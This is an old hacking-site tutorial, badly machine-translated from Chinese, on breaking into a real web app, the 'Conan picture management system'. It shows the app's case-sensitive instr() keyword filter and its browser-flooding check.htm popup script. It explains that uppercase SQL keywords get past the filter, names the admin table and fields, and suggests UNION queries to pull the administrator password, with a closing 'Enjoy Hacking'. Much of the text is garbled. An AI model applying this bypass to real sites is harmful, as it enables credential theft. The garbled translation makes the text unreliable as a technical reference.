Gently bypass your line of Defense-vulnerability warning-the black bar safety net

ID MYHACK58:6220066092
Type myhack58
Reporter 佚名
Modified 2006-01-05T00:00:00


The other day when browsing a site when, for a moment, hands itching, in the URL behind a“ and 1=2”is intended to take a look at this system there is no SQL injection vulnerability, which know that the browser POPs up two dialog boxes and then unlimited pop-up window. Had to finish off the process, depressed, I use the TT browser, the other window also to the end, 5 5 5 5 to to to Really outrageous, injection you also don't like this whole me, I'd like to see you this program has what the ability is. In the end did not dare to go try that system, it is from the other place to start to get a webshell, after Inquire, originally it was called“Conan picture management system”stuff. Know a sign that's good do., online Down a look at the source code first. It is the view. asp has this:

if instr(id,"'") or instr(id,"select") or instr(id,"in") or instr(id,"from") or instr(id,"len") or instr(id,"where") or instr(id,"or") or instr(id,"and") then Response. Write("<script language=javascript>alert('you want to do?'); window. location. href='check.htm'</script>") Response. End end if 'here the filter TMD of Bad character

Now look at the check. htm content:

<script language=javascript> alert("I Call it! Do you want to do what???"); for (i=1;i<=1 0 0 0 0 0 0 0 0 0 0;i++) { window. open("") } </script>

Look at its evil intentions right, pop up two dialog boxes will open 1 0 0 million every window, Oh, cool not? Of course can't get to him in vain to bully Ah, I have to break it of SQL injection Defense, Oh, careful analysis of the original his defense is just useless, we need only transform the look of the character will be done. See his judgment statement, is to use the instr function to determine, if found and, or, select等关键字就转到check.htm the. Well, look at the instr function usage: InStr([start, ]string1, string2[, compare]) There are 2 optional parameters start and compare, the problem is precisely out in the compare here. The Compare to 0 perform a binary comparison 1 perform the text comparison. The default is 0. In short, compare is 0 when the comparison is case-sensitive. IE instr(“ and 1=2”,”And”)is equal to 0. That now better organized, just put it the filter a keyword of one letter changed to uppercase, and then he was so long the filter statement is equal to only filter“’”, it does not matter Ah, anyway, the injection with less than“’”to.

His table name is admin, the user field is admin, the Password field of the password, slowly hand guess, Oh, it seems no tools can be used, now know that the programming still useful. Of course, you can also use Union queries to directly obtain the administrator password, this than guess the solution much faster, or write a program?, faster 1 to.

! attachments/200508/12_181119_1.jpg

Copy URL to access it, eh, no, first you have to put the key word switch, in particular, to note that the password contains“or”admin included“in”Table say I didn't warn you.

! attachments/200508/12_181208_2.jpg

Oh, again: Enjoy Hacking it! Oh, and finally said If you want to defense then simply put the parameter compare is set to 1 is ok.